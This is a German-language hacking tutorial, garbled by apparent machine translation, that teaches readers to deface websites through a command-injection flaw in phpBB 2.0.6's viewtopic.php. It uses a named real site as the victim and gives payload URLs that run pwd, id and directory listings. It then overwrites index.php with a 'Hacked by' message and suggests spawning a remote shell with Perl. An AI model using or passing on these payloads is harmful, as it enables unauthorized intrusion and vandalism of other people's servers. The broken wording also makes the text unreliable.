Der komplette Führer zu verunstalten (aktualisiert)

Einführung
Oft sehe ich eine Frage auf dem Forum: "Wie Websites zu brechen?" oder "Wie zadefeysit Website?". Heute können Sie Portal defeysnut, nicht einen Tropfen der Mühe gegeben zu haben! Alle Liebhaber von leichten Beute einladen! =)

Hauptteil
Heute werde ich darüber sprechen, wie defeysy verschiedenen Standorten durch Fehler in der populären Skripte zu machen. Es wurde vor kurzem eine schwere Sicherheitslücke in der beliebten phpBB-Engine entdeckt.
Wurde eine Schwachstelle im Modul viewtopic.php entdeckt

Die Tatsache , dass ein Angreifer beliebigen PHP-Skript auf einem anfälligen System mit der Übertragungsleitung ausführen könnte , ist über die viewtopic.php? T = 1 & highlight =% 27

Wie Sie wahrscheinlich schon erraten haben, können diese Sicherheitsanfälligkeit beliebige Kommandos auf einem anfälligen beliebiger Länge Server auszuführen. Heute nutzen wir dieses Loch, und gemeinsam mit Ihnen die bestehende realen Server brechen. Unser Ziel verunstalten wird nur, dh der Ersatz der Homepage auf unseren eigenen.

Also, wir gehen, wird unser Opfer www.maxmuscle.dk (zum Zeitpunkt der Veröffentlichung des Artikels Portal ist resistent gegen Verwundbarkeit).
Das erste, was unser Auge fällt, wenn Sie diese Seite besuchen, so ist es das, was es auf einem Portal-System PHP-Nuke basiert.

Standardmäßig ist das System genau das phpBB-Forum. Wir klicken auf einen Link, der uns zum Forum führt, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) und stellen Sie sicher, dass dies die Version von phpBB 2.0.6 .

Wir passieren die Anfrage an das Forum dieser Art:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

und wir finden, dass der Motor durch die Linie des charakteristischen Zeichen anstelle eines Spitznamen eines der Mitglieder als bewiesen verbraucht wird: ") #i". Aber es hat nichts zu bedeuten, können wir leicht die Ausführung von Befehlen auf dem Server abbrechen, aber wir werden nicht spekulieren, und nur versuchen, ihn auszuführen:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = PWD

Dieser Befehl (PWD) sollte uns das Verzeichnis zeigen, wo wir jetzt sind, wenn das passiert, dann ist es aus diesem Ergebnis folgt, dass die Ausführung von Befehlen auf dem Server möglich. Und so geschieht es. Pfad Verzeichnis / var / www / html / osclux / angezeigt. Der folgende Befehl sollte «id» unseren Zugang zu überprüfen.

Wie wir sehen können wir die richtige uid = 99 (niemand), dh die richtigen Web - Server haben. Jetzt leiten wir die Liste der Ordner und Dateien im Verzeichnis html_public Befehl "dir / var / www / html / osclux" und feststellen , dass die so notwendig für uns defeysa index.php in diesem Verzeichnis ist.

Also haben wir auf der Ziellinie sind - der Befehl von vasya Hacked echo> index.php, vyvdem wir Ihre Homepage Inschrift «Hacked by vasya». Prüfen. Es hat sich heraus.

Sie haben verunstalten.

Statt einer Schlussfolgerung
Es ist so unkompliziert defeys wurde gehalten hackzona.ru, wurde auf diese Weise Forum gebrochen nsd.ru. Beachten Sie auch, dass dies die einfachste Umsetzung dieses Loch ist, unter guten Bedingungen bestimmten Port lauscht leicht Bucht auf dem Server sein kann, um das Skript in Perl und haben bereits eine Vollschale mit niemand Privilegien.